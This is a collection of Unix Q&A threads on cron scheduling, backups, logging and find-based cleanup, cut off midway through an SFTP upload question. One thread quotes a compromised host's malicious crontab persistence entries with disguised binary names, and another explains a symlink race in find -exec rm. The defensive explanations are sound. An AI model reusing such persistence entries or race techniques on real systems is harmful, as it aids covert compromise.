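For illustration, a hypothetical file under /etc/cron.d would look like this - note the extra user field between the schedule and the command, just as in /etc/crontab (the script path here is made up):

```
# /etc/cron.d/example
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
*/5 * * * * www-data /usr/bin/php /var/www/html/some-script.php
```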
| Defining scheduled jobs with cron, 'crontab -e' vs '/etc/crontab' |
1,400,072,087,000 |
In crontab I can set this syntax 5 4 * * 3-5
Which translates to every Wednesday, Thursday and Friday at 4:05, and that works well. But when I use 5-3, which I expected to translate to Friday, Saturday, ..., Wednesday, it reports a syntax error. I gather the range must be in ascending order, but what if I need it the other way around?
I use this to test cron syntax.
|
One way is:
5 4 * * 0-3,5-7 script
(0 and 7 both mean Sunday.)
Another way:
5 4 * * 0,1,2,3,5,6 script
| Cron arbitrary weekday range |
1,400,072,087,000 |
CRONTABS
I'm using rsnapshot with cron. Here's what sudo crontab -l shows me.
0 */4 * * * /usr/bin/rsnapshot hourly
30 3 * * * /usr/bin/rsnapshot daily
0 3 * * 1 /usr/bin/rsnapshot weekly
OUTPUT
I went to check on the backup folder to see if everything is working correctly, but here is the time sorted output:
elijah@degas:~$ ls -lt /media/backup/
total 0
drwxrwxrwx 1 root root 0 May 30 04:00 hourly.1
drwxrwxrwx 1 root root 0 May 23 04:00 hourly.2
drwxrwxrwx 1 root root 0 May 17 04:00 hourly.3
drwxrwxrwx 1 root root 0 May 14 04:00 hourly.4
drwxrwxrwx 1 root root 0 May 13 04:00 hourly.5
drwxrwxrwx 1 root root 0 May 12 04:00 daily.0
drwxrwxrwx 1 root root 0 May 10 04:00 daily.1
drwxrwxrwx 1 root root 0 May 7 04:00 daily.2
drwxrwxrwx 1 root root 0 May 4 04:00 daily.3
drwxrwxrwx 1 root root 0 Apr 29 16:00 daily.4
drwxrwxrwx 1 root root 0 Apr 28 20:00 daily.5
drwxrwxrwx 1 root root 0 Apr 28 16:04 hourly.0
drwxrwxrwx 1 root root 0 Apr 28 12:21 daily.6
drwxrwxrwx 1 root root 0 Apr 27 10:09 weekly.1
drwxrwxrwx 1 root root 0 Apr 25 07:23 weekly.3
The output seems almost random! Why could this be happening? I have what I thought was an identical configuration on a different machine, and it seems to be working fine.
SYSLOG
elijah@degas:~$ cat /var/log/syslog.1 | grep cron
Jun 20 07:40:21 degas anacron[2795]: Job `cron.daily' terminated
Jun 20 07:40:21 degas anacron[2795]: Normal exit (1 job run)
Jun 20 08:17:01 degas CRON[3144]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 20 09:17:01 degas CRON[3228]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 20 10:17:01 degas CRON[4893]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 20 11:17:01 degas CRON[8737]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 20 12:17:01 degas CRON[10192]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 20 13:17:01 degas CRON[11870]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 20 14:17:01 degas CRON[12829]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 20 15:17:01 degas CRON[13614]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 20 15:54:28 degas crontab[14446]: (root) BEGIN EDIT (root)
Jun 20 15:55:27 degas crontab[14446]: (root) END EDIT (root)
Jun 20 15:55:29 degas crontab[14460]: (root) LIST (root)
Jun 20 16:17:01 degas CRON[14770]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 20 16:44:04 degas crontab[14911]: (root) DELETE (root)
Jun 20 16:44:07 degas crontab[14913]: (root) LIST (root)
Jun 20 17:17:01 degas CRON[15713]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 20 18:17:01 degas CRON[15842]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 20 19:17:01 degas CRON[15928]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 20 20:17:01 degas CRON[16023]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 20 21:17:01 degas CRON[16110]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 20 22:17:01 degas CRON[16212]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 20 23:17:01 degas CRON[16300]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 21 00:00:01 degas CRON[16372]: (root) CMD (invoke-rc.d atop _cron)
Jun 21 00:17:01 degas CRON[16437]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 21 01:17:01 degas CRON[16525]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 21 02:17:01 degas CRON[16612]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 21 03:17:01 degas CRON[16701]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 21 04:17:01 degas CRON[16798]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 21 05:17:01 degas CRON[16886]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 21 06:17:01 degas CRON[16974]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 21 06:25:01 degas CRON[16988]: (root) CMD (test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ))
Jun 21 07:17:01 degas CRON[17061]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 21 07:30:01 degas CRON[17083]: (root) CMD (start -q anacron || :)
Jun 21 07:30:01 degas anacron[17086]: Anacron 2.3 started on 2016-06-21
Jun 21 07:30:01 degas anacron[17086]: Will run job `cron.daily' in 5 min.
Jun 21 07:30:01 degas anacron[17086]: Jobs will be executed sequentially
Jun 21 07:35:01 degas anacron[17086]: Job `cron.daily' started
Jun 21 07:35:01 degas anacron[17099]: Updated timestamp for job `cron.daily' to 2016-06-21
RSNAPSHOT TEST
elijah@degas:~$ /usr/bin/rsnapshot -t hourly
echo 23633 > /var/run/rsnapshot.pid
/bin/rm -rf /media/backup/hourly.5/
mv /media/backup/hourly.4/ /media/backup/hourly.5/
mv /media/backup/hourly.3/ /media/backup/hourly.4/
mv /media/backup/hourly.2/ /media/backup/hourly.3/
mv /media/backup/hourly.1/ /media/backup/hourly.2/
/bin/cp -al /media/backup/hourly.0 /media/backup/hourly.1
/usr/bin/rsync -a --delete --numeric-ids --relative --delete-excluded \
--exclude=/var/ --exclude=/space/ --exclude=/nfs/ --exclude=/media/ \
--exclude=/proc/ --exclude=/sys/ --exclude=/dev/ --exclude=/tmp/ \
--exclude=/cdrom/ --exclude=media/backup /. \
/media/backup/hourly.0/Backup
touch /media/backup/hourly.0/
|
After some extended discussion it appears that the filesystem may be corrupted. As an example, rm -rf fails - as root - on a normal tree of files.
After unmounting the filesystem, fsck identified it as NTFS.
Frustratingly, I have seen NTFS fail on other Linux-based platforms under the heavy loads incurred by rsnapshot. Nothing is sufficiently repeatable to file a bug, but a week's worth of rsnapshot runs can usually corrupt the filesystem.
My recommendation is to replace the NTFS filesystem with something native to a Linux-based system, such as ext4. As an aside, if the backups must be accessed from a Windows platform, I have had good use from the Ext2FSD utility and driver for extN filesystems (also at sourceforge).
| What the heck is going on with my cron scheduler? (rsnapshot) |
1,459,409,985,000 |
On a Debian server, I have a crontab entry that should call a script every day at 04:21 AM.
That's what it did, until today ... but now the script is called every 15 minutes for no apparent reason!
I have not changed the crontab in months!
Here's the crontab line:
21 4 * * * /usr/bin/wget -O /dev/null http://www.domain.tld/tasks/hebdomadaire.php &> /dev/null
And here's the Apache log ( cat access.log | grep "hebdomadaire" ) :
SERVER_IP - - [28/Mar/2016:04:21:01 +0000] "GET /tasks/hebdomadaire.php HTTP/1.1" 200 454 "-" "Wget/1.13.4 (linux-gnu)"
SERVER_IP - - [29/Mar/2016:04:21:01 +0000] "GET /tasks/hebdomadaire.php HTTP/1.1" 200 454 "-" "Wget/1.13.4 (linux-gnu)"
SERVER_IP - - [30/Mar/2016:04:21:01 +0000] "GET /tasks/hebdomadaire.php HTTP/1.1" 200 454 "-" "Wget/1.13.4 (linux-gnu)"
SERVER_IP - - [31/Mar/2016:04:21:01 +0000] "GET /tasks/hebdomadaire.php HTTP/1.1" 200 454 "-" "Wget/1.13.4 (linux-gnu)"
SERVER_IP - - [31/Mar/2016:04:36:02 +0000] "GET /tasks/hebdomadaire.php HTTP/1.1" 200 454 "-" "Wget/1.13.4 (linux-gnu)"
SERVER_IP - - [31/Mar/2016:04:51:04 +0000] "GET /tasks/hebdomadaire.php HTTP/1.1" 200 454 "-" "Wget/1.13.4 (linux-gnu)"
SERVER_IP - - [31/Mar/2016:05:06:07 +0000] "GET /tasks/hebdomadaire.php HTTP/1.1" 200 454 "-" "Wget/1.13.4 (linux-gnu)"
SERVER_IP - - [31/Mar/2016:05:21:11 +0000] "GET /tasks/hebdomadaire.php HTTP/1.1" 200 454 "-" "Wget/1.13.4 (linux-gnu)"
SERVER_IP - - [31/Mar/2016:05:36:16 +0000] "GET /tasks/hebdomadaire.php HTTP/1.1" 200 454 "-" "Wget/1.13.4 (linux-gnu)"
SERVER_IP - - [31/Mar/2016:05:51:22 +0000] "GET /tasks/hebdomadaire.php HTTP/1.1" 200 454 "-" "Wget/1.13.4 (linux-gnu)"
SERVER_IP - - [31/Mar/2016:06:06:30 +0000] "GET /tasks/hebdomadaire.php HTTP/1.1" 200 454 "-" "Wget/1.13.4 (linux-gnu)"
SERVER_IP - - [31/Mar/2016:06:21:38 +0000] "GET /tasks/hebdomadaire.php HTTP/1.1" 200 454 "-" "Wget/1.13.4 (linux-gnu)"
SERVER_IP - - [31/Mar/2016:06:36:47 +0000] "GET /tasks/hebdomadaire.php HTTP/1.1" 200 454 "-" "Wget/1.13.4 (linux-gnu)"
SERVER_IP - - [31/Mar/2016:06:51:57 +0000] "GET /tasks/hebdomadaire.php HTTP/1.1" 200 454 "-" "Wget/1.13.4 (linux-gnu)"
SERVER_IP - - [31/Mar/2016:07:07:07 +0000] "GET /tasks/hebdomadaire.php HTTP/1.1" 200 454 "-" "Wget/1.13.4 (linux-gnu)"
How can that be?
|
The default behaviour of wget (documented in the manual) is to retry after its read timeout expires, which defaults to 900 s (i.e. 15 minutes).
Adding --timeout=0 solves the problem here.
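The fixed entry would then be something along these lines (also replacing the bash-only &> with portable sh redirection, since cron runs commands with /bin/sh):

```
21 4 * * * /usr/bin/wget --timeout=0 -O /dev/null http://www.domain.tld/tasks/hebdomadaire.php > /dev/null 2>&1
```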
| Cron suddenly calls a script every 15 minutes |
1,459,409,985,000 |
I want to run a cron job every three hours, indefinitely, and be able to check whether or not it ran.
Could anyone help me with what values to give in this format:
crontab -e
Tried following:
0 0/3 * * * /home/wlogic/SHScripts/DiskCheck/DiskSpaceCheck.sh
When I save file using :wq
I get the message:
crontab: installing new crontab
"/tmp/crontab.vErqAL":1: bad hour
errors in crontab file, can't install.
Do you want to retry the same edit?
|
You should be able to use the following line to run a job every 3 hours:
0 */3 * * * /home/wlogic/SHScripts/DiskCheck/DiskSpaceCheck.sh
To check whether your cron job ran, check your syslog or cron log. This can be different between distributions, for example:
Ubuntu: /var/log/syslog
Dec 1 11:17:01 testhost CRON[6746]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
CentOS: /var/log/cron
Dec 1 11:01:01 testhost run-parts(/etc/cron.hourly)[13259]: starting 0yum-hourly.cron
Dec 1 11:03:50 server run-parts(/etc/cron.hourly)[13302]: finished 0yum-hourly.cron
Solaris: /var/cron/log
> CMD: /usr/lib/sa/sa1
> sys 12394 c Tue Dec 1 11:20:00 2015
< sys 12394 c Tue Dec 1 11:20:00 2015
If you want to log all output of the scheduled command itself you can use the following:
0 */3 * * * /home/wlogic/SHScripts/DiskCheck/DiskSpaceCheck.sh > /path/to/job-log 2>&1
The above will redirect the output (if any) to the logfile /path/to/job-log and will also redirect the output of STDERR to this logfile.
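If you also want each run clearly delimited in that logfile, a small hypothetical wrapper script can prepend a timestamp before handing off to the real job (the /tmp path and name are just illustrations):

```shell
# Create the wrapper script.
cat > /tmp/run-logged.sh <<'EOF'
#!/bin/sh
# Print a timestamp header, then replace this shell with the real command.
echo "=== run at $(date '+%F %T') ==="
exec "$@"
EOF
chmod +x /tmp/run-logged.sh

# Quick check with a trivial command in place of the real job:
/tmp/run-logged.sh echo "disk check done"
```

The crontab entry then becomes 0 */3 * * * /tmp/run-logged.sh /home/wlogic/SHScripts/DiskCheck/DiskSpaceCheck.sh >> /path/to/job-log 2>&1.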
| How to set Cron job that run after every three hours for indefinite period; with Logging? |
1,459,409,985,000 |
I have a Linux host on which I would like to run a cron job. I never shut this machine down; I always suspend it. I want to run a job once a day, but I cannot set it for a particular time since my machine may or may not be running then. I would like the cron job to run the first time each day that my machine comes alive, and not again for the rest of the day. Is that possible? Please do let me know, thanks!
|
This is handled by anacron, which runs the default cron.daily etc. jobs on Fedora.
If this is a root job, you can either add it to /etc/cron.daily or to /etc/anacrontab.
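For instance, a sketch of an /etc/anacrontab entry (the job name and script path are hypothetical): the fields are the period in days, the delay in minutes before the job starts, a job identifier, and the command:

```
# period  delay  job-id      command
1         10     mydailyjob  /usr/local/bin/mydailyjob.sh
```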
| Floating time cron job |
1,459,409,985,000 |
I want sar/sadc to collect everything (interrupts, disk, etc.) every 10 seconds, starting at noon, for the entire hour. With the second line I want to capture the contents of /proc/interrupts into a log file every minute during the noon hour. Please verify the syntax.
* 12 * * * root /usr/lib64/sa/sa1 -S XALL 10 360
*/1 12 * * * root cat /proc/interrupts >> /root/proc_int.log && date >> /root/proc_int.log
|
The sa1 command collects and stores binary data in the system activity data file. It is a kind of shell wrapper around the sadc command and accepts all of its parameters, so check the sadc man page for details.
The first line above is almost correct: -S XALL means to collect all available system activities, and the collection will run for 1 hour (10 s * 360 samples = 3600 s = 1 h) as required. However, the minute field should be 0 rather than *, otherwise cron would start a new sa1 process every minute of hour 12. The second line is all right.
| Is this sar/sysstat cron job formatted correctly? |
1,459,409,985,000 |
I have a script located /myscript/script.sh and I have a cronjob that I submitted like this:
sudo crontab -e
The contents of the crontab are as follows:
*/1 * * * * ./myscript/script.sh
The script requires root privileges as it deletes directories. Is there anything glaringly wrong with the way I've done this?
|
The biggest problem is that you put . in front of the script name. . is the current directory, which you are blindly assuming you know when you set up the crontab entry. Bottom line, don't use relative paths in cron scripts: give the absolute path to the script.
Also, */1 is pointlessly verbose. It means exactly the same thing as *. Your script runs every minute of every day. (Does it really need to run so often?)
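Putting both fixes together, and assuming the script really lives at /myscript/script.sh as in the question, the entry might look like this (still every minute, but with an absolute path):

```
* * * * * /myscript/script.sh
```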
| Cron job doesn't seem to be executing in ubuntu |
1,459,409,985,000 |
I want to run a cron job which deletes .txt files older than 7 days. I have two commands.
The first command:
/usr/bin/find /var/www/example.com/wp-content/targetdir -name "*.txt" -type f -mtime +7 -exec rm -f {} \;
The second command:
/usr/bin/find /var/www/example.com/wp-content/targetdir -name "*.txt" -type f -mtime +7 -delete
Both commands can be used to delete .txt files older than 7 days. I have read that the first command is associated with a race condition. Can someone please elaborate on the advantages of using the second command over the first? What are the pros and cons of using one over the other?
|
The race I saw mentioned is this, from Stéphane Chazelas's comment to another question:
Note that -exec rm {} + has race condition vulnerabilities which -delete (where available) doesn't have. So don't use it on directories that are writeable by others. Some finds also have a -execdir that mitigates against those vulnerabilities.
I didn't actually see this elaborated there(*), but the race I can see there relates to how -exec rm passes the full path to the file, causing the tree to be traversed again within the rm process.
After find traverses the tree and evaluates the conditions it's given on the command line, rm traverses the tree again, and it doesn't know about the conditions given to find, so now they are not checked. With -delete and -execdir, find traverses the tree, makes whatever checks it's given, and then deletes the file, all the time keeping a file descriptor open on the directories.
Someone could get in between and rename a file or directory between find evaluating its conditions and rm running. So, something like this:
root runs find . -type f -user joe -exec rm -f {} \;
find runs and finds directory ./this/, holding some files owned by user joe
another user renames ./this and creates a symlink with the same name, pointing somewhere else
find runs rm -f ./this/hello.txt, now following the symlink.
hello.txt could now be owned by anyone, not just user joe, and since find was launched as root, rm also is, and it happily removes the file at the other end of the symlink. This is a classic time-of-check to time-of-use (TOCTTOU) vulnerability.
One can probably come up with worse examples, but that's the general idea.
With -delete or -execdir, this can't happen, since the file descriptor find has open on ./this still points to the same directory, even if that directory is renamed. -execdir runs rm with its working directory set to that directory (there's the fchdir() system call that changes the working directory by file descriptor, again not going through a name lookup), while -delete similarly deletes the file using a name relative to the containing directory (with unlinkat()).
Note that by default (i.e. without the -L option), find doesn't follow symlinks found when traversing the directory tree. This doesn't help here, since again rm just passes the path it was given to the underlying system call, and symlinks are followed there as usual. It does mean that the replaced directory (./this above) has to be an actual directory replaced with a symlink (or another directory) though, not a symlink replaced by another symlink.
(*)20 minutes after writing this, I noticed Stéphane's answer (linked below) did have a link to the GNU manual describing the same race issue. (sigh.)
The issues with -delete implying -depth, and making -prune ineffective,
are unrelated to that, and are not a race condition. This is mentioned in Why did find with -delete erase the files in my /save/ directory when find without delete was not able to locate them? GNU findutils' find seems to have acquired an error message for that:
$ find a -name foo -prune -o -name hello.txt -delete
find: The -delete action automatically turns on -depth, but -prune does nothing when -depth is in effect. If you want to carry on anyway, just explicitly use the -depth option.
Another difference is that -exec rm -f -- {} + uses only standard tools, while -delete is not standard, even if somewhat commonly supported. E.g. FreeBSD and GNU support it, but Busybox doesn't. See: find: "-exec rm {} ;" vs. "-delete" - why is the former widely recommended? on superuser.com.
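As a quick sandbox check of the -delete semantics discussed above (the -mtime filter is omitted here so that the just-created files match immediately):

```shell
# Build a throwaway directory with one matching and one non-matching file.
dir=$(mktemp -d)
touch "$dir/old.txt" "$dir/keep.log"

# Delete only the *.txt files, in-place, with no separate rm process.
find "$dir" -name '*.txt' -type f -delete

# only keep.log should remain
ls "$dir"
```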
| Cron job to delete all files older than 7 days: -exec rm -f {} \; vs -delete [duplicate] |
1,459,409,985,000 |
I have seen this question many times (1, 2), but I didn't find the answer, so here I go.
I'm running Debian 11, but I guess it works the same for any Debian-like distro.
My crontab -e looks like:
...
@reboot sleep 20 && /opt/isPromscaleOnOrOff.sh
...
And the content of isPromscaleOnOrOff.sh:
#!/bin/bash
SERVICE="promscale"
if pgrep -x "$SERVICE" >/dev/null
then
echo "$SERVICE is running"
else
echo "$SERVICE is stopped, I will run it now"
nohup promscale --db-name asdf1234--db-password asdf1234 --db-user asdf1234 --db-ssl-mode allow --install-extensions & >> /dev/null
disown
fi
But when I restart the VM the script doesn't run, though the cron log in /var/log/syslog shows crontab starting the script.
What I want to achieve can easily be done by daemonizing the process (which I indeed did); I just want to know why cron doesn't start up my script.
|
Jobs run through cron aren't run in the same runtime environment that you have on your desktop. None of your PATH changes, or other environment variable settings from ~/.bashrc are automatically propagated to your cron job. For example, there's no $DISPLAY, so GUI programs need special treatment (read man xhost).
One can set environment variables for all one's cron jobs in the crontab file
Read man 5 crontab.
Look at the results of echo "=== id ===";id;echo "=== set ===";set;echo "=== env ===";env | sort;echo "=== alias ===";alias in each of your environments.
Since the command part of the crontab line is, by default, interpreted by /bin/sh, which has a simpler syntax than /bin/bash, I recommend having the command be a call to a bash script (executable, on a mounted filesystem, starting with #!/bin/bash) which sets up the environment, then calls the desired program.
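For example, a minimal sketch of a crontab that sets PATH itself and logs the script's output so failures become visible (the PATH value and log location are just illustrations):

```
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
@reboot sleep 20 && /opt/isPromscaleOnOrOff.sh >> /tmp/promscale-check.log 2>&1
```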
| Why crontab doesn't execute a scheduled bash script? |
1,459,409,985,000 |
I'm using Linux CentOS 7, as a non-root user. When I try to add a cron job it doesn't seem possible; I enter
crontab -e
but I don't get an option to select an editor or to add a cron job; I just see blue ~ signs??
Also, the select-editor command does not exist.
Any help? What should I do?
Screenshot:
http://prntscr.com/qxu06n
|
That is VIM (or possibly another vi clone). You are in a text editor. To add a cron job, just edit using that editor.
You do not have select-editor because that is part of the "sensible-utils" package on Debian. (Previously it was part of a "debianutils" package which was more obviously Debian-specific.) That package is in the EPEL, not in CentOS proper.
The thing that RedHat has adopted from Debian is the "alternatives" system. That controls what the editor command maps to.
There are several possibilities:
Your VISUAL environment variable points to vim (or vi).
Your VISUAL environment variable points to editor, and the currently selected alternative for editor is VIM.
Your VISUAL environment variable is unset, the fallback is editor, and the currently selected alternative for editor is VIM.
Your VISUAL environment variable is unset, the fallback is vim (or perhaps vi).
There are two approaches to changing the editor, if you want to use another one:
Change what your VISUAL environment variable points to. Depending on how you set it in the shell, this changes the full-screen editor for just the current interactive shell session, or even just the current command (if you assign the variable as a prefix to a simple command). You can of course set it in a login script.
Unset your VISUAL environment variable and change the alternative for editor. Note that this changes the meaning of editor for everyone on the system. It also depends on the assumption that editor is the fallback when the environment variable is unset. That's a reasonable fallback to use on "alternatives" operating systems like Debian, OpenSUSE, and Fedora/CentOS/RHEL. But the fallback logic is of course encoded in many individual commands and scripts, and not every software author chooses editor as the fallback.
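The per-command form mentioned above works like this (shown with nano purely as an example):

```shell
unset VISUAL

# A leading assignment applies only to that single command...
VISUAL=nano sh -c 'echo "inside:  ${VISUAL:-unset}"'

# ...and is gone again in the surrounding shell afterwards.
echo "outside: ${VISUAL:-unset}"
```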
Further reading
Alternatives command and Centos7
https://unix.stackexchange.com/a/477769/5132
Jonathan de Boyne Pollard (2020). Unix editors and pagers. Frequently Given Answers.
| crontab -e doesnt shows option to select editor - what to do? |
1,459,409,985,000 |
I was hacked this morning!
Does anyone have an idea of what the entry of the crontab below might mean?
1st: They created a dir structure
.rsync/
├── a
│ ├── a
│ ├── anacron
│ ├── cron
│ ├── init0
│ ├── run
│ └── stop
2nd: They executed this cronjob
from: crontab -l
0 */3 * * /home/ftpuser/.nullcache/a/upd>/dev/null 2>&1
@reboot /home/ftpuser/.nullcache/a/upd>/dev/null 2>&1
5 8 * * 0 /home/ftpuser/.nullcache/b/sync>/dev/null 2>&1
@reboot /home/ftpuser/.nullcache/b/sync>/dev/null 2>&1
0 0 */3 * * /tmp/.X17-unix/.rsync/c/aptitude>/dev/null 2>&1
Last: it ran all my CPUs at 100% and sucked all the bandwidth from the network.
I killed all PIDs associated with ftpuser and everything went back to normal.
|
You have not solved the problem.
What you found may only be the tip of the iceberg. There are many ways to hide malware. What you could see easily may well be designed to lull you into a false sense of security.
Even if you managed to find all the malware, until you've found and plugged the hole it used to get in, it's likely to reappear.
If you have other people's data (including but not limited to private identifying information such as email addresses, IP addresses, purchase histories, usage logs, etc.), you need to notify these people of the breach and let them know in what way their data may be compromised. It's not just a good idea, it's the law in many places.
You need to take the system down, investigate how the malware got in, and reinstall a clean copy from scratch.
For more information, see How do I deal with a compromised server?.
This does look like some fairly unsophisticated malware. It's in directories with vaguely plausible names:
ftpuser is a user that might conceivably exist on some servers whose structure is stuck a decade or two ago. (Authenticated FTP should have long been replaced by SSH, including SFTP. Anonymous FTP has been pretty much replaced by HTTP(S).)
.nullcache is hidden in some listings. “Nullcache” is a thing in various contexts; while I'm not aware of a tool that uses a .nullcache directory, it's just plausible enough not to look completely out of place in a directory listing.
aptitude is a system administration tool that wouldn't be out of place in a process listing (on distributions that use it, i.e. Debian and derivatives). sync is a standard utility, but one that doesn't normally run for long, so while it would be out of place in a process listing, it has a harmless look. upd is not a standard name, but it looks harmless because it looks like it's short for “update”.
anacron and cron are common tools and there are directories with this name on many systems (in /var/spool). init0 is close to init. A run exists in various places (/run, /var/run). stop is uncommon as a directory name, but again not completely out of place.
/tmp/.X17-unix is completely implausible, but is visually similar to /tmp/.X11-unix, which exists on all systems running the X Window System (X11), on which the standard Unix graphical environment is based; many people wouldn't know that the number 11 is significant.
The cron jobs run various binaries in these vaguely plausible locations at boot time (@reboot), once a week (5 8 * * 0) or roughly every three days (0 0 */3 * *).
| Unauthorized access to cron |
1,459,409,985,000 |
I have a python script on my RaspberryPi that I want to run at these general times:
Weekdays, after 4:30 PM until 00:00 running every 30 minutes
Weekends, after 8:00 AM until 00:00, running every 60 minutes
I know how to schedule it daily with Cron,
30 16 * * 1-5 /mnt/myHDD/myscript.py
but can't figure out how to have it run every X minutes, until Y time.
I think this is how I'd run it every 30 minutes, correct? But how do I also run it every hour from 16:30 until 02:00 the next day?
1-59/30 * * 1-5 /mnt/myHdd/myscript.py
Edit: sorry, to clarify, it doesn't have to be exactly every 30 minutes... the script simply downloads pictures from my phone to my RPi, and I'd like it to run every so often on weekdays when I'm home (i.e. after 16:30/17:00), and on weekends every hour or so during general waking hours.
|
Please see my EDIT at the end of this answer.
This answer is "close" to your first requirement:
*/30 16-23,0 * * 1-5
Translation: “At every 30th minute past every hour from 16 through 23 and 0 on every day-of-week from Monday through Friday.”
The first answer misses because it doesn't run every half-hour. Perhaps you could kludge around that by placing a sleep in your code:
time.sleep( 1800 )
And this answer is "close" to your first requirement:
0,*/30 16-23,0 * * 1-5
Translation: “At minute 0 and every 30th minute past every hour from 16 through 23 and 0 on every day-of-week from Monday through Friday.”
The second answer misses because it runs at 16:00, 30 minutes in advance of when you wished to start. This is probably a "closer" match to your stated requirements, if that doesn't matter. If it does matter, and you can wait until 17:00, then a simple change to the schedule will take care of that:
0,*/30 17-23,0 * * 1-5
This is the answer to your second requirement:
0 8-23,0 * * 6-7
EDIT: I had a mental block. It's occurred to me that there is an exact answer to your question. It's to have 3 crontab entries instead of just 2:
0,*/30 17-23,0 * * 1-5 /mnt/myHDD/myscript.py
30 16 * * 1-5 /mnt/myHDD/myscript.py
0 8-23,0 * * 6-7 /mnt/myHDD/myscript.py
| Schedule python script every day, between certain hours, every X minutes |
1,459,409,985,000 |
I have this cron job script:
#!/bin/bash
YEAR=`date +%Y`
MONTH=`date +%m`
DAY=`date +%d`
mkdir -p $YEAR/$MONTH/$DAY
mysqldump -uroot -p1234 locatari > $YEAR/$MONTH/$DAY/backup.sql
And I want to run this, let's say, every 3 minutes. I tried each of these crontab entries and none of them seems to work:
3 * * * * /usr/bin /home/rome/cronjob/back.sh > /home/rome/cronjob
3 * * * * /home/rome/cronjob/back.sh/
3 * * * * exec `/bin/bash /home/rome/cronjob/back.sh`
3 * * * * /bin/bash /home/rome/cronjob/back.sh > /dev/null 2>&1
I only made it run when I did:
bash back.sh
All worked as expected with the bash command, what is wrong to my cron scheduler? Problem is that with the crontab command, I can't see my output, it only works with bash command.
|
None of your crontab job entries matches what you typed at the command line
/usr/bin /home/rome/cronjob/back.sh tries to run a program /usr/bin, but that's a directory
/home/rome/cronjob/back.sh/ tries to treat your script as a directory
exec `/bin/bash /home/rome/cronjob/back.sh` tries to use the output of your program as a program name to run
/bin/bash /home/rome/cronjob/back.sh > /dev/null 2>&1 this might work, except that you have thrown away all the output of the script, so you won't see any errors
Based on feedback from your comments it seems you probably want something like this (I've omitted /home/rome because that is your home directory anyway). Note the */3 in the first field: your 3 * * * * entries would run once an hour, at three minutes past the hour, not every 3 minutes:
*/3 * * * * cd cronjob && bash back.sh >back.log 2>&1
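A more cron-proof variant of the backup script itself (a sketch; the paths and credentials are the question's own, and the mysqldump line is left commented out so you can verify the path logic first) builds absolute paths instead of relying on cron's working directory:

```shell
#!/bin/sh
# Sketch: make back.sh independent of cron's working directory (which is
# normally $HOME, not ~/cronjob) by using absolute paths throughout.
BASEDIR=/home/rome/cronjob
DATEDIR=$(date +%Y/%m/%d)      # one date call instead of three
TARGET="$BASEDIR/$DATEDIR"
echo "backup would go to: $TARGET/backup.sql"
# in the real script:
#   mkdir -p "$TARGET" && mysqldump -uroot -p1234 locatari > "$TARGET/backup.sql"
```

With absolute paths in place, the crontab entry no longer needs the leading `cd`.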
| Cronjob output not working [closed] |
1,459,409,985,000 |
I am pretty new to unix systems and their workings. Is there any way to schedule a cron job in unix which runs every day at 12:00 AM and checks: if the day is Thursday it stops a service, and if the day is Friday it starts the service again?
|
You're overcomplicating it by trying to make one job that conditionally does two things. You want one job to stop the service on Thursday, and another to start it on Friday, as in the following cron table.
0 0 * * 4 service myspiffyservice stop > /dev/null 2>&1 # stop myspiffyservice on Thursday
0 0 * * 5 service myspiffyservice start > /dev/null 2>&1 # start myspiffyservice on Friday
If you are talking about executing a job rather than starting or stopping a service, this can also be handled by one cron job that only runs on non-Thursdays:
0 0 * * 0-3,5-6 /path/to/myspiffyjob > /dev/null 2>/dev/null # Run spiffy job on non-Thursdays
The above schedule translates to 'At 00:00 on every day-of-week from Sunday through Wednesday and every day-of-week from Friday through Saturday'.
| scheduling cron jobs to stop a service on Thursday and start it on Friday |
1,459,409,985,000 |
I have a script in Linux that creates a file and then executes an Expect script that uploads the created file to an SFTP server. I have this running in cron, and for whatever reason the upload always fails; however, when I execute the script in the shell the upload is successful. I checked the logs and they're not really telling me where the process is going wrong.
Here's the shell script
#!/bin/bash
cd /home/mysql/paradata/repoupload || exit
mv /mnt/restrictedreports/Restricted/Corporate/Accounting/GL2013/gldetail.csv /home/mysql/paradata/repoupload 2>/dev/null
mv /mnt/restrictedreports/Restricted/Corporate/Accounting/GL2013/vgldetail.csv /home/mysql/paradata/repoupload 2>/dev/null
test -f gldetail.csv && ./SAFCO.sh
test -f vgldetail.csv && ./SAFCO.sh
if [ -f vgldetail.csv ]; then filename=vgldetail.csv; fi
if [ -f gldetail.csv ]; then filename=gldetail.csv; fi
if [ $filename == gldetail.csv ];
then
./uploadsafco.exp REPOEX > lastftplogsafco.txt
else
./uploadvafco.exp REPOEX > lastftplogvafco.txt
fi
Here's the expect script
#!/usr/bin/expect -f
set force_conservative 0 ;# set to 1 to force conservative mode even if
;# script wasn't run conservatively originally
if {$force_conservative} {
set send_slow {1 .1}
proc send {ignore arg} {
sleep .1
exp_send -s -- $arg
}
}
set arg1 [lindex $argv 0]
set timeout 30
expect_after {
